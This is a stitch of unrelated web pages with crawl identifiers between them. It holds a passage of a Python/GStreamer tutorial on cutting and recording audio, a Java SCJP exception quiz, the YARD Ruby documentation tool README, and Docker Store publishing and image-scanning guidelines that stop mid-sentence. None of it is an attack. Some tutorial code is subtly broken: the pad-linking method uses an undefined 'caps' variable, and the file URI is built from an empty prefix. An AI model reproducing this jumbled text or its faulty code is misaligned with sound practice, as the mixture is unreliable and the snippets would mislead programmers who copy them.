30 seconds, that is, the end time will correspond to 2 minutes, 10 seconds on the original track. The last two lines of this method build a pipeline and connect signals with class methods. - Next, build the GStreamer pipeline. 1 def constructPipeline(self): 2 self.pipeline = gst.Pipeline() 3 self.filesrc = gst.element_factory_make( 4 "gnlfilesource") 5 6 # Set properties of filesrc element 7 # Note: the gnlfilesource signal will be connected 8 # in self.connectSignals() 9 self.filesrc.set_property("uri", 10 "" + self.inFileLocation) 11 self.filesrc.set_property("media-start", 12 self.media_start_time*gst.SECOND) 13 self.filesrc.set_property("media-duration", 14 self.media_duration*gst.SECOND) 15 16 self.audioconvert = \ 17 gst.element_factory_make("audioconvert") 18 19 self.encoder = \ 20 gst.element_factory_make("lame", "mp3_encoder") 21 22 self.filesink = \ 23 gst.element_factory_make("filesink") 24 25 self.filesink.set_property("location", 26 self.outFileLocation) 27 28 #Add elements to the pipeline 29 self.pipeline.add(self.filesrc, self.audioconvert, 30 self.encoder, self.filesink) 31 # Link elements 32 gst.element_link_many(self.audioconvert,self.encoder, 33 self.filesink) The highlighted line of code (line 3) creates the gnlfilesource. We call this as self.filesrc. As discussed earlier, this is responsible for loading and decoding audio data and presenting only the required portion of audio data that we need. It enables a higher level of abstraction in the main pipeline. - The code between lines 9 to 13 sets three properties of gnlfilesource, uri, media-start and media-duration. The media-start and media-duration are specified in nanoseconds. Therefore, we multiply the parameter value (which is in seconds) by gst.SECOND which takes care of the units. - The rest of the code looks very much similar to the Audio Converter example. In this case, we only support saving the file in mp3 audio format. The encoder element is defined on line 19. self.filesink determines where the output file will be saved. Elements are added to the pipeline by self.pipeline.add call and are linked together on line 32. Note that the gnlfilesource element, self.filesrc, is not linked with self.audioconvert while constructing the pipeline. Like the decodebin, the gnlfilesource implements dynamic pads. Thus, the pad is not available when the pipeline is constructed. It is created at the runtime depending on the specified input audio format. The "pad_added" signal of gnlfilesource is connected with a method self.gnonlin_pad_added. - Now write the connectSignals and gnonlin_pad_added methods. def connectSignals(self): # capture the messages put on the bus. bus = self.pipeline.get_bus() bus.add_signal_watch() bus.connect("message", self.message_handler) # gnlsource plugin uses dynamic pads. # Capture the pad_added signal. self.filesrc.connect("pad-added",self.gnonlin_pad_added) def gnonlin_pad_added(self, gnonlin_elem, pad): pad.get_caps() compatible_pad = \ self.audioconvert.get_compatible_pad(pad, caps) pad.link(compatible_pad) The highlighted line of code in method connectSignals connects the pad_added signal of gnlfilesource with a method gnonlin_pad_added. The gnonlin_pad_added method is identical to the decodebin_pad_added method of class AudioConverter developed earlier. Whenever gnlfilesource creates a pad at the runtime, this method gets called and here, we manually link the pads of gnlfilesource with the compatible pad on self.audioconvert. - The rest of the code is very much similar to the code developed in the Playing an audio section. For example, AudioCutter.run method is equivalent to AudioPlayer.play and so on. You can review the code for remaining methods from the file AudioCutter.py. - Once everything is in place, run the program from the command line as: $python AudioCutter.py - This should create a new MP3 file which is just a specific portion of the original audio file. What just happened? We accomplished creation of a utility that can cut a piece out of an MP3 audio file (yet keep the original file unchanged). This audio piece was saved as a separate MP3 file. We learned about a very useful plugin, called Gnonlin, intended for non-linear multimedia editing. A few fundamental properties of gnlfilesource element in this plugin to extract an audio file. Have a go hero – extend MP3 cutter - Modify this program so that the parameters such as media_start_time can be passed as an argument to the program. You will need a method like processArguments(). You can use either getopt or OptionParser module to parse the arguments. - Add support for other file formats. For example, extend this code so that it can extract a piece from a wav formatted audio and save it as an MP3 audio file. The input part will be handled by gnlfilesource. Depending upon the type of output file format, you will need a specific encoder and possibly an audio muxer element. Then add and link these elements in the main GStreamer pipeline. Recording After learning how to cut out a piece from our favorite music tracks, the next exciting thing we will have is a 'home grown' audio recorder. Then use it the way you like to record music, mimicry or just a simple speech! Remember what pipeline we used to play an audio? The elements in the pipeline to play an audio were filesrc ! decodebin ! audioconvert ! autoaudiosink. The autoaudiosink did the job of automatically detecting the output audio device on your computer. For recording purposes, the audio source is going to be from the microphone connected to your computer. Thus, there won't be any filesrc element. We will instead replace with a GStreamer plugin that automatically detects the input audio device. On similar lines, you probably want to save the recording to a file. So, the autoaudiosink element gets replaced with a filesink element. autoaudiosrc is an element we can possibly use for detecting input audio source. However, while testing this program on Windows XP, the autoaudiosrc was unable to detect the audio source for unknown reasons. So, we will use the Directshow audio capture source plugin called dshowaudiosrc, to accomplish the recording task. Run the gst-inspect-0.10 dshowaudiosrc command to make sure it is installed and to learn various properties of this element. Putting this plugin in the pipeline worked fine on Windows XP. The dshowaudiosrc is linked to the audioconvert. With this information, let's give it a try using the command-line version of GStreamer. Make sure you have a microphone connected or built into your computer. For a change, we will save the output file in ogg format. gst-launch-0.10.exe dshowaudiosrc num-buffers=1000 ! audioconvert ! audioresample ! vorbisenc ! oggmux ! filesink location=C:/my_voice.ogg The audioresample re-samples the raw audio data with different sample rates. Then the encoder element encodes it. The multiplexer or mux, if present, takes the encoded data and puts it into a single channel. The recorded audio file is written to the location specified by the filesink element. Time for action – recording Okay, time to write some code that does audio recording for us. - Download the file RecordingAudio.py and review the code. You will notice that the only important task is to set up a proper pipeline for audio recording. Content-wise, the other code is very much similar to what we learned earlier in the article. It will have some minor differences such as method names and print statements. In this section we will discuss only the important methods in the class AudioRecorder. - Write the constructor. def __init__(self): self.is_playing = False self.num_buffers = -1 self.error_message = "" self.processArgs() self.constructPipeline() self.connectSignals() - This is similar to the AudioPlayer.__init__() except that we have added a call to processArgs() and initialized the error reporting variable self.error_message and the variable that indicates the total duration of the recording. - Build the GStreamer pipeline by writing constructPipeline method. 1 def constructPipeline(self): 2 # Create the pipeline instance 3 self.recorder = gst.Pipeline() 4 5 # Define pipeline elements 6 self.audiosrc = \ 7 gst.element_factory_make("dshowaudiosrc") 8 9 self.audiosrc.set_property("num-buffers", 10 self.num_buffers) 11 12 self.audioconvert = \ 13 gst.element_factory_make("audioconvert") 14 15 self.audioresample = \ 16 gst.element_factory_make("audioresample") 17 18 self.encoder = \ 19 gst.element_factory_make("lame") 20 21 self.filesink = \ 22 gst.element_factory_make("filesink") 23 24 self.filesink.set_property("location", 25 self.outFileLocation) 26 27 # Add elements to the pipeline 28 self.recorder.add(self.audiosrc, self.audioconvert, 29 self.audioresample, 30 self.encoder, self.filesink) 31 32 # Link elements in the pipeline. 33 gst.element_link_many(self.audiosrc,self.audioconvert, 34 self.audioresample, 35 self.encoder,self.filesink) - We use the dshowaudiosrc (Directshow audiosrc) plugin as an audio source element. It finds out the input audio source which will be, for instance, the audio input from a microphone. - On line 9, we set the number of buffers property to the one specified by self.num_buffers. This has a default value as -1 , indicating that there is no limit on the number of buffers. If you specify this value as 500 for instance, it will output 500 buffers (5 second duration) before sending a End of Stream message to end the run of the program. - On line 15, an instance of element 'audioresample' is created. This element is takes the raw audio buffer from the self.audioconvert and re-samples it to different sample rates. The encoder element then encodes the audio data into a suitable format and the recorder file is written to the location specified by self.filesink. - The code between lines 28 to 35 adds various elements to the pipeline and links them together. - Review the code in file RecordingAudio.py to add rest of the code. Then run the program to record your voice or anything that you want to record that makes an audible sound! Following are sample command-line arguments. This program will record an audio for 5 seconds. $python RecordingAudio.py –-num_buffers=500 --out_file=C:/my_voice.mp3 What just happened? We learned how to record an audio using Python and GStreamer. We developed a simple audio recording utility to accomplish this task. The GStreamer plugin, dshowaudiosrc, captured the audio input for us. We created the main GStreamer Pipeline by adding this and other elements and used it for the Audio Recorder program. Summary This article gave us deeper insight into the fundamentals of audio processing using Python and the GStreamer multimedia framework. We used several important components of GStreamer to develop some frequently needed audio processing utilities. The main learning points of the article can be summarized as follows: - GStreamer installation: We learned how to install GStreamer and the dependent packages on various platforms. This set up a stage for learning audio processing techniques and will also be useful for the next chapters on audio/video processing. - A primer on GStreamer: A quick primer on GStreamer helped us understand important elements required for media processing. - Use of GStreamer API to develop audio tools: We learned how to use GStremer API for general audio processing. This helped us develop tools such as an Audio player, a file format converter, an MP3 cutter, and audio recorder. Further resources on this subject: -
http://www.packtpub.com/article/python-multimedia-working-with-audios
CC-MAIN-2014-10
en
refinedweb
Given below the sample code : 1 public class A { 2 static void test() throws Error{ 3 if (true) throw new AssertionError(); 4 System.out.print("test "); 5 } 6 public static void main(String[] args) { 7 try { test(); } 8 catch (Exception ex) { System.out.print("exception "); } 9 System.out.print("end "); 11}} How can we correct the above code ? 1. No need of correction 2. By changing "Exception" class to "Error" at line 8 in "caught" 3. By changing "throws Error" to "throws Exception" at line number 2. 4. By throwing exception in place of error at line 2. (2) Above code will give uncaught exception as output. Since it is of type "error " so it should be handled by error class object.
http://www.roseindia.net/tutorial/java/scjp/part6/question17.html
CC-MAIN-2014-10
en
refinedweb
On 05/11/2010 02:03 AM, Andrew Morton wrote:> On Sun, 09 May 2010 13:16:38 +0300> Boaz Harrosh <[email protected]> wrote:> >> On 05/07/2010 12:05 PM, Dan Carpenter wrote:>>> For kmap_atomic() we call kunmap_atomic() on the returned pointer.>>> That's different from kmap() and kunmap() and so it's easy to get them>>> backwards.>>>>>> Signed-off-by: Dan Carpenter <[email protected]>>>>>>>> Thank you Dan, I'll push it ASAP. > >> Looks like a bad bug. So this is actually a leak, right? kunmap_atomic>> would detect the bad pointer and do nothing?> > void kunmap_atomic(void *kvaddr, enum km_type type)> {> unsigned long vaddr = (unsigned long) kvaddr & PAGE_MASK;> enum fixed_addresses idx = type + KM_TYPE_NR*smp_processor_id();> > /*> * Force other mappings to Oops if they'll try to access this pte> * without first remap it. Keeping stale mappings around is a bad idea> * also, in case the page changes cacheability attributes or becomes> * a protected page in a hypervisor.> */> if (vaddr == __fix_to_virt(FIX_KMAP_BEGIN+idx))> kpte_clear_flush(kmap_pte-idx, vaddr);> else {> #ifdef CONFIG_DEBUG_HIGHMEM> BUG_ON(vaddr < PAGE_OFFSET);> BUG_ON(vaddr >= (unsigned long)high_memory);> #endif> }> > pagefault_enable();> }> > if CONFIG_DEBUG_HIGHMEM=y, kunmap_atomic() will go BUG.> > if CONFIG_DEBUG_HIGHMEM=n, kunmap_atomic() will do nothing, leaving the> pte pointing at the old page. Next time someone tries to use that> kmap_atomic() slot,> > void *kmap_atomic_prot(struct page *page, enum km_type type, pgprot_t prot)> {> enum fixed_addresses idx;> unsigned long vaddr;> > /* even !CONFIG_PREEMPT needs this, for in_atomic in do_page_fault */> pagefault_disable();> > if (!PageHighMem(page))> return page_address(page);> > debug_kmap_atomic(type);> > idx = type + KM_TYPE_NR*smp_processor_id();> vaddr = __fix_to_virt(FIX_KMAP_BEGIN + idx);> BUG_ON(!pte_none(*(kmap_pte-idx)));> set_pte(kmap_pte-idx, mk_pte(page, prot));> > return (void *)vaddr;> }> > kmap_atomic_prot() will go BUG because the pte wasn't cleared.> > > I can only assume that this code has never been run on i386. I'd suggest> adding a "Cc: <[email protected]>" to the changelog if you have> expectations that anyone will try to run it on i386.> Right! Everyone I know runs 64bit. I will add the Cc: <[email protected]>to the patch. Thanks.Boaz
http://lkml.org/lkml/2010/5/11/391
CC-MAIN-2014-10
en
refinedweb
YARD: Yay! A Ruby Documentation Tool IRC: irc.freenode.net / #yard Git: Author: Loren Segal Contributors: License: MIT License Latest Version: 0.8.7.3 Release Date: November 1st 2013 Synopsis. Feature List 1. RDoc/SimpleMarkup Formatting Compatibility: YARD is made to be compatible with RDoc formatting. In fact, YARD does no processing on RDoc documentation strings, and leaves this up to the output generation tool to decide how to render the documentation. 2. Yardoc Meta-tag Formatting Like Python, Java, Objective-C and other languages: YARD uses a '@tag' style definition syntax for meta tags alongside regular code documentation. These tags should be able to happily sit side by side RDoc formatted documentation, but provide a much more consistent and usable way to describe important information about objects, such as what parameters they take and what types they are expected to be, what type a method should return, what exceptions it can raise, if it is deprecated, etc.. It also allows information to be better (and more consistently) organized during the output generation phase. You can find a list of tags in the Tags.md file. YARD also supports an optional "types" declarations for certain tags. This allows the developer to document type signatures for ruby methods and parameters in a non intrusive but helpful and consistent manner. Instead of describing this data in the body of the description, a developer may formally declare the parameter or return type(s) in a single line. Consider the following method documented with YARD formatting: # Reverses the contents of a String or IO object. # # @param [String, #read] contents the contents to reverse # @return [String] the contents reversed lexically def reverse(contents) contents = contents.read if contents.respond_to? :read contents.reverse end With the above @param tag, we learn that the contents parameter can either be a String or any object that responds to the 'read' method, which is more powerful than the textual description, which says it should be an IO object. This also informs the developer that they should expect to receive a String object returned by the method, and although this may be obvious for a 'reverse' method, it becomes very useful when the method name may not be as descriptive. 3. Custom Constructs and Extensibility of YARD: YARD is designed to be extended and customized by plugins. Take for instance the scenario where you need to document the following code: class List # Sets the publisher name for the list. cattr_accessor :publisher end This custom declaration provides dynamically generated code that is hard for a documentation tool to properly document without help from the developer. To ease the pains of manually documenting the procedure, YARD can be extended by the developer to handle the cattr_accessor construct and automatically create an attribute on the class with the associated documentation. This makes documenting external API's, especially dynamic ones, a lot more consistent for consumption by the users. YARD is also designed for extensibility everywhere else, allowing you to add support for new programming languages, new data structures and even where/how data is stored. 4. Raw Data Output: YARD also outputs documented objects as raw data (the dumped Namespace) which can be reloaded to do generation at a later date, or even auditing on code. This means that any developer can use the raw data to perform output generation for any custom format, such as YAML, for instance. While YARD plans to support XHTML style documentation output as well as command line (text based) and possibly XML, this may still be useful for those who would like to reap the benefits of YARD's processing in other forms, such as throwing all the documentation into a database. Another useful way of exploiting this raw data format would be to write tools that can auto generate test cases, for example, or show possible unhandled exceptions in code. 5. Local Documentation Server: YARD can serve documentation for projects or installed gems (similar to gem server) with the added benefit of dynamic searching, as well as live reloading. Using the live reload feature, you can document your code and immediately preview the results by refreshing the page; YARD will do all the work in re-generating the HTML. This makes writing documentation a much faster process. Installing To install YARD, use the following command: $ gem install yard (Add sudo if you're installing under a POSIX system as root) Alternatively, if you've checked the source out directly, you can call rake install from the root project directory. Important Note for Debian/Ubuntu users: there's a possible chance your Ruby install lacks RDoc, which is occasionally used by YARD to convert markup to HTML. If running which rdoc turns up empty, install RDoc by issuing: $ sudo apt-get install rdoc Usage There are a couple of ways to use YARD. The first is via command-line, and the second is the Rake task. 1. yard Command-line Tool YARD comes packaged with a executable named yard which can control the many functions of YARD, including generating documentation, graphs running the YARD server, and so on. To view a list of available YARD commands, type: $ yard --help Plugins can also add commands to the yard executable to provide extra functionality. Generating Documentation The yardoc executable is a shortcut for yard doc. The most common command you will probably use is yard doc, or yardoc. You can type yardoc --help to see the options that YARD provides, but the easiest way to generate docs for your code is to simply type yardoc in your project root. This will assume your files are located in the lib/ directory. If they are located elsewhere, you can specify paths and globs from the commandline via: $ yardoc 'lib/**/*.rb' 'app/**/*.rb' ...etc... The tool will generate a .yardoc file which will store the cached database of your source code and documentation. If you want to re-generate your docs with another template you can simply use the --use-cache (or -c) option to speed up the generation process by skipping source parsing. YARD will by default only document code in your public visibility. You can document your protected and private code by adding --protected or --private to the option switches. In addition, you can add --no-private to also ignore any object that has the @private meta-tag. This is similar to RDoc's ":nodoc:" behaviour, though the distinction is important. RDoc implies that the object with :nodoc: would not be documented, whereas YARD still recommends documenting private objects for the private API (for maintainer/developer consumption). You can also add extra informative files (README, LICENSE) by separating the globs and the filenames with '-'. $ yardoc 'app/**/*.rb' - README LICENSE FAQ If no globs precede the '-' argument, the default glob ( lib/**/*.rb) is used: $ yardoc - README LICENSE FAQ Note that the README file can be specified with its own --readme switch. You can also add a .yardopts file to your project directory which lists the switches separated by whitespace (newlines or space) to pass to yardoc whenever it is run. A full overview of the .yardopts file can be found in YARD::CLI::Yardoc. Queries The yardoc tool also supports a --query argument to only include objects that match a certain data or meta-data query. The query syntax is Ruby, though a few shortcuts are available. For instance, to document only objects that have an "@api" tag with the value "public", all of the following syntaxes would give the same result: --query '@api.text == "public"' --query 'object.has_tag?(:api) && object.tag(:api).text == "public"' --query 'has_tag?(:api) && tag(:api).text == "public"' Note that the "@tag" syntax returns the first tag named "tag" on the object. To return the array of all tags named "tag", use "@@tag". Multiple --query arguments are allowed in the command line parameters. The following two lines both check for the existence of a return and param tag: --query '@return' --query '@param' --query '@return && @param' For more information about the query syntax, see the YARD::Verifier class. 2. Rake Task The second most obvious is to generate docs via a Rake task. You can do this by adding the following to your Rakefile: YARD::Rake::YardocTask.new do |t| t.files = ['lib/**/*.rb', OTHER_PATHS] # optional t. = ['--any', '--extra', '--opts'] # optional end both the files and options settings are optional. files will default to lib/**/*.rb and options will represents any options you might want to add. Again, a full list of options is available by typing yardoc --help in a shell. You can also override the options at the Rake command-line with the OPTS environment variable: $ rake yard OPTS='--any --extra --opts' 3. yri RI Implementation The yri binary will use the cached .yardoc database to give you quick ri-style access to your documentation. It's way faster than ri but currently does not work with the stdlib or core Ruby libraries, only the active project. Example: $ yri YARD::Handlers::Base#register $ yri File.relative_path Note that class methods must not be referred to with the "::" namespace separator. Only modules, classes and constants should use "::". You can also do lookups on any installed gems. Just make sure to build the .yardoc databases for installed gems with: $ sudo yard gems If you don't have sudo access, it will write these files to your ~/.yard directory. yri will also cache lookups there. 4. yard server Documentation Server The yard server command serves documentation for a local project or all installed RubyGems. To serve documentation for a project you are working on, simply run: $ yard server And the project inside the current directory will be parsed (if the source has not yet been scanned by YARD) and served at. Live Reloading If you want to serve documentation on a project while you document it so that you can preview the results, simply pass --reload ( -r) to the above command and YARD will reload any changed files on each request. This will allow you to change any documentation in the source and refresh to see the new contents. Serving Gems To serve documentation for all installed gems, call: $ yard server --gems This will also automatically build documentation for any gems that have not been previously scanned. Note that in this case there will be a slight delay between the first request of a newly parsed gem. 5. yard graph Graphviz Generator You can use yard graph to generate dot graphs of your code. This, of course, requires Graphviz and the dot binary. By default this will generate a graph of the classes and modules in the best UML2 notation that Graphviz can support, but without any methods listed. With the --full option, methods and attributes will be listed. There is also a --dependencies option to show mixin inclusions. You can output to stdout or a file, or pipe directly to dot. The same public, protected and private visibility rules apply to yard graph. More options can be seen by typing yard graph --help, but here is an example: $ yard graph --protected --full --dependencies Changelog November.1.13: 0.8.7.3 release -)..
https://www.rubydoc.info/gems/yard/0.8.7.4/frames
CC-MAIN-2018-22
en
refinedweb
I've been puzzled by the concept of how Java and C# handles namespaces. Firstly, examples of namespace pollution in some programming languages: using namespace std import math.* Math.functionname @Override using XElement using System; using System.Collections.Generic; using System.Linq; using System.Text; //the ones above are auto-generated by Visual Studio, too using System.Xml.Linq; System.Xml.Linq.XElement std::cout import java.util.linkedlist import java.util.* As already pointed out by others, the problem of namespace pollution is not as prominent in Java as it is in C++. The main reason why namespace pollution is a problem in C++ (and thus called "pollution" in the first place) is that it may cause errors in other modules. This is explained in more detail in Why is “using namespace std;” considered bad practice?. (The concerning thing here is that this may not only refer to compile errors: For compile errors, you are forced to do something and to resolve ambiguities. The really concerning thing is that it may cause the code to still compile properly, but afterwards simply call the wrong functions!) In Java, each import affects only the file in which it is contained. This means that the above mentioned pollution can still occur locally in one file. (One could say: It's only the problem of the author who actually caused the namespace pollution, which is just fair) Analogously to the case in the above mentioned link: Imagine you are using two libraries, "foo" and "bar". And out of laziness (or lack of knowledge of best practices), you are using the wildcard imports: import foo.*: import bar.*: class MyClass { void someMethod() { // Assume that this class is from the "foo" librariy, and the // fully qualified name of this class is "foo.Example" Example e = new Example(); } } Now imagine you upgrade your version of the "bar" library. And the new version contains a class called bar.Example. Then the above code will fail to compile, because the reference to the class Example is ambiguous. The same problem can, by the way, also appear with static imports. It's a bit more delicate and subtle, and collisions are a bit more likely. That's why they say that you should use static imports very sparingly. A side note: Of course, these collisions and ambiguities can easily be resolved. You can always use the fully qualified names instead. Most modern Java IDEs offer a functionality to organize/optimize the imports. For example, in Eclipse, you can always press CTRL+Shift+O, which will (depending on the settings in Preferences->Java->Code Style->Organize Imports) replace all wildcard imports with the individual ones.
https://codedump.io/share/cCwnuUGvKe65/1/does-namespace-pollution-in-java-or-c-exist-like-in-c
CC-MAIN-2018-22
en
refinedweb
I have been following the ember quick start guide to create an app that displays some data () but instead of displaying just a javascript array with scientists names, I want to display the products from the following json. I have placed the json file in the public folder. It looks like: { "products": [ { "_id": "58ff60ffcd082f040072305a", "slug": "apple-tree-printed-linen-butterfly-bow-tie", "name": "Apple Tree Printed Linen Butterfly Bow Tie ", "description": "This fun 40 Colori Apple Tree Printed Linen Butterfly Bow Tie features a design of various apple trees built from tiny polka dots. The back of this bow tie features a polka dot print in complementing colours which when the bow tie is tied will pop out from behind making for a subtle yet unique detail. The playful design, stand out natural linen texture, and colourful combinations make this bow tie a perfect accessory for any outfit!\n", "standard_manufacturer": "58cbafc55491430300c422ff", "details": "Size: Untied (self-tie) bow tie with an easily adjustable neck strap from 13-3/4'' to 19'' (35 to 48 cm)\nHeight: 6 cm\nMaterial: Printed 100% linen\nCare: Dry clean\nMade in Italy", "sizes": [ { "value": "Violet", "size": "57722c80c8595b0300a11e61", "_id": "58ff60ffcd082f0400723070", "marked_as_oos_at": null, "quantity": -1, "stock": true, "id": "58ff60ffcd082f0400723070" }, and so on. My code for the model of the route for displaying the list is as follows import Ember from 'ember'; export default Ember.Route.extend({ model() { //return ['Marie Curie', 'Mae Jemison', 'Albert Hofmann']; return Ember.$.getJSON("/products.json"); } }); I have followed the tutorial exactly except for the return Ember.$.getJSON("/products.json"); line in scientists.js. My data is not being displayed and the error i get in the ember inspector is compiled.js:2 Uncaught TypeError: Failed to execute 'getComputedStyle' on 'Window': parameter 1 is not of type 'Element'. at E (compiled.js:2) at Object.u (compiled.js:25) at compiled.js:25 E @ compiled.js:2 u @ compiled.js:25 (anonymous) @ compiled.js:25 I am very new with ember and fairly new with js. Any help appreciated! Thanks!
https://discuss.emberjs.com/t/ember-app-cannot-load-json-data-from-local-file/13254
CC-MAIN-2018-34
en
refinedweb
Publish content on Docker StoreEstimated reading time: 15 minutes Permitted content and support options Content that runs on a Docker Enterprise Edition (Docker Certified Infrastructure) may be published in the Store. This content may also qualify to become a Docker Certified Container or Plugin image and be backed by collaborative Docker/Publisher support Content that runs on the Docker Community Edition may be published in the Store, but is not supported by Docker nor is it eligible for certification. Content that requires a non Certified Infrastructure environment may not be published in the Store. Onboarding The Docker Store publishing process begins from the landing page: sign in with your Docker ID and specify a product name and image source from a private repository. Your product images must be stored in private repositories of Docker Cloud and/or Hub as they serve as an internal staging area from which you can revise and submit content for review. After specifying a source, provide the content-manifest items to populate your product details page. These items include logos, descriptions, and licensing and support links so that customers can make informed decisions about your image. These items are submitted alongside the image itself for moderation. The Docker Store team then conducts a comprehensive review of your image and metadata. We use Docker Security Scanning to evaluate the security of your product images, and share results with you as the publisher. During the image-moderation phase, we iterate back and forth with publishers to address outstanding vulnerabilities and content-manifest issues until the image is ready for publication. Commercial content and other supported images may qualify for the Docker Certified Container or Plugins quality mark. The testing for this program goes beyond the vulnerability scan and also evaluates container images for Docker best practices developed over years of experience. Collaborative support capability between Docker and the publisher is also established. Refer to the diagram below for a high-level summary: Create great content Create your content, and follow our best practices to Dockerize it. Keep your images small, your layers few, and your components secure. Refer to the links and guidelines listed below to build and deliver great content: Best practices for writing Dockerfiles Official repositories on Docker Hub Docker Bench for Security Here are some best practices when it comes to building vulnerability-free Docker images: Choose a secure base image (See your Dockerfile’s FROM: directive) Many base images have a strong record of being secure, including: Debian Linux: both small and tightly-controlled, Debian-linux is a good alternative if you’re currently using Ubuntu. Alpine Linux: Alpine is a minimal linux distribution with an excellent security record. Alpine-based application images: these include python:alpine, ruby:alpine, and golang:alpine. They are secure and minimal, while providing the convenience of their non-Alpine alternatives. Docker strongly recommends Alpine Linux. The founder of this Linux distribution is leading an initiative at Docker to provide safe, compact base images for all container applications. Remove unused components Often, vulnerabilities exist in components that aren’t actually used in the containerized application. To avoid this, you can: Follow best practices when using the apt-getcommand. Run apt-get-removeto destroy any components required to build but not actually run your application. Usually, this involves creating multi-line Dockerfile directives, as seen below. The following example shows how to remove curland python-pipafter they are used to install the Python requestspackage, all in a single Dockerfile directive: RUN apt-get update && \ apt-get install -y --no-install-recommends curl python-pip && \ pip install requests && \ apt-get remove -y python-pip curl && \ rm -rf /var/lib/apt/lists/ Files introduced in one directive of your Dockerfile can only be removed in the same directive (and not in subsequent directives in your Dockerfile). Keep required components up-to-date Your images are composed of open-source libraries and packages that amass vulnerabilities over time and are consequently patched. To ensure the integrity of your product, keep your images up-to-date: Periodically update your base image’s version, especially if you’re using a version deemed to be vulnerable. Re-build your image periodically. Directives including commands such as apt-get install ...pull the latest versions of dependencies, which may include security fixes. Create and maintain your publisher profile in the Store Let the Docker community know who you are. Add your details, your company story, and what you do. At the very minimum, we require: - Legal entity name - Company website - Phone number - Valid company email - Company icon/logo (square; at least 512x512px Prepare your image-manifest materials You must provide the namespace (including repository and tags) of a private repository on Docker Cloud or Hub that contains the source for your product. This repository path is not shown to users, but the repositories you choose determine the Product Tiers available for customers to download. The following content information helps us make your product look great and discoverable: - Product Name - Product icon/logo - Short description: a one-to-two-sentence summary; up to 140 characters - Category: Database, Networking, Business Software, etc. and any search tags - Long description: includes product details/pitch - Screenshot(s) - Support link - Product tier name - Product tier description - Product tier price - Installation instructions - Link to license agreements How the manifest information is displayed in the UI This is an approximate representation. We frequently make enhancements to the look and some elements might shift around. Support your users Docker users who download your content from the Store might need your help later, so be prepared for questions! The information you provide with your submission saves support time in the future. Support information If you provide support along with your content, include that information. Is there a support website? What email address can users contact for help? Are there self-help or troubleshooting resources available? Support SLA Include a Service Level Agreement (SLA) for each image you’re offering for the Store. An SLA is your commitment to your users about the nature and level of support you provide to them. Make sure your SLA includes support hours and response-time expectations, where applicable. Security and audit policies Docker Store scans your official images for vulnerabilities with the Docker Security Scanning tool, and audits consumer activity of your images to provide you intelligence about the use of your product. Docker Security Scanning Docker Security Scanning automatically and continuously assesses the intergity of your products. The Docker Security Scanning tool deconstructs an image, conducts a binary scan of the bits to identify the open-source components present in each image layer, and associates those components with known vulnerabilities and exposures. Docker then shares the scan results with you as the publisher, so that you can modify the content of your images as necessary. Your scan results are private, and are never shared with end customers or other publishers. Interpret results To interpret the results of a scanned image: Log on to Docker Store. Navigate to the repository details page (for example, Nginx). Click View Available Tags under the pull command in the upper right of the UI. Displalyed is a list of each tag scan with its age. A solid green bar indicates a clean scan without known vulnerabilities. Yellow, orange, and red indicate minor, major, and critical vulnerabilities respectively. Vulnerability scores Vulnerability scores are defined by the entity that issues the vulnerability, such as NVD, and are based on a Qualitative Severity Rating Scale defined as part of the Common Vulnerability Scoring System (CVSS) specification. Click a scan summary to see a list of results for each layer of the image. Each layer may have one or more scannable components represented by colored squares in a grid. Base layers Base layers contain components that are included in the parent image, but that you did not build and may not be able to edit. If a base layer has a vulnerability, switch to a version of the parent image that does not have any vulnerabilities, or to a similar but more secure image. Hover over a square in the grid, then click to see the vulnerability report for that specific component. Only components that add software are scanned. If a layer has no scannable components, it shows a No components in this layermessage. Click the arrow icon (twice) to expand the list and show all vulnerable components and their CVE report codes. Click one of the CVE codes to view the original vulnerability report. Classification of issues All Scan results include the CVE numbers and a CVSS (Common Vulnerability Scoring System) Score. CVE Identifiers (also referred to by the community as “CVE names,” “CVE numbers,” “CVE entries,” “CVE-IDs,” and “CVEs”) are unique identifiers for publicly-known, cyber-security vulnerabilities. The Common Vulnerability Scoring System (CVSS) provides an open framework for communicating the characteristics and impacts of IT vulnerabilities. Its quantitative model ensures repeatable, accurate measurement while enabling users to see the underlying vulnerability characteristics that were used to generate the scores. As a result, CVSS is well-suited as a standard measurement system for industries, organizations, and governments that need accurate and consistent vulnerability-impact scores. CVSS is commonly used to prioritize vulnerability-remediation activities, and calculate the severity of vulnerabilities discovered on systems. The National Vulnerability Database (NVD) provides CVSS scores for almost all known vulnerabilities. Docker classifies the severity of issues per CVSS range, Docker classification, and service level agreement (SLA) as follows. In addition to CVSS, the Docker Security team can identify or classify vulnerabilities that need to be fixed, and categorize them in the minor-to-critical range. The publisher is presented with initial scan results, including all components with their CVEs and their CVSS scores. If you use Docker’s Scanning Service, you can subscribe to a notification service for new vulnerabilities. Failure to meet above SLAs may cause the listing to be put on “hold”. A warning label shows up on the marketplace listing. An email is sent to the users who have downloaded and subscribed for notifications. A Repo’s listing can stay in the “hold” state for a maximum of 1 month, after which the listing is revoked. Usage audit and reporting Unless otherwise negotiated, an audit of activity on publisher content is retained for no less than 180 days. A monthly report of said activity is provided to the publisher with the following data: (1) report of content download by free and paid customers by date and time; (2) report of purchase, cancellations, refunds, tax payments, where applicable, and subscription length for paid customers of the content; and (3) the consolidated amount to be received by the publisher. Certification There are three types of certification that appear in Docker Store. Certifies that a container image on Docker Store has been tested; complies best practices guidelines; runs on a Docker Certified Infrastructure; has proven provenance; been scanned for vulnerabilities; and is supported by Docker and the content publisher This certification is designed for volume, network, and other plugins that access system level Docker APIs. Docker Certified Plugins provide the same level of assurance as a Docker Certified Container, but go further by having passed an additional suite of API compliance testing. Indicates that the release of the Docker Edition and the underlying platform have been tested together and are supported in combination by both Docker and the partner. Docker Certified Publisher FAQ What is the Docker Certified program? Docker Certified Container images and plugins are meant to differentiate high quality content on Docker Store. Customers can consume Certified Containers with confidence knowing that both Docker and the publisher stands behind the solution. Further details can be found in the Docker Partner Program Guide. What are the benefits of Docker Certified? Docker Store promotes Docker Certified Containers and Plugins running on Docker Certified Infrastructure trusted and high quality content. With over 8B image pulls and access to Docker’s large customer base, a publisher can differentiate their content by certifying their images and plugins. With a revenue share agreement, Docker can be a channel for your content. The Docker Certified badge can also be listed alongside external references to your product. How is the Docker Certified Container image listed on Docker Store? These images are differentiated from other images on store through a certification badge. A user can search specifically for CI’s by limiting their search parameters to show only certified content. Is certification optional or required to be listed on Store? Certification is recommended for most commercial and supported container images. Free, community, and other commercial (non-certified) content may also be listed on Docker Store. How is support handled? All Docker Certified Container images and plugins running on Docker Certified Infrastructure come with SLA based support provided by the publisher and Docker. Normally, a customer contacts the publisher for container and application level issues. Likewise, a customer contacts Docker for Docker Edition support. In the case where a customer calls Docker (or vice versa) about an 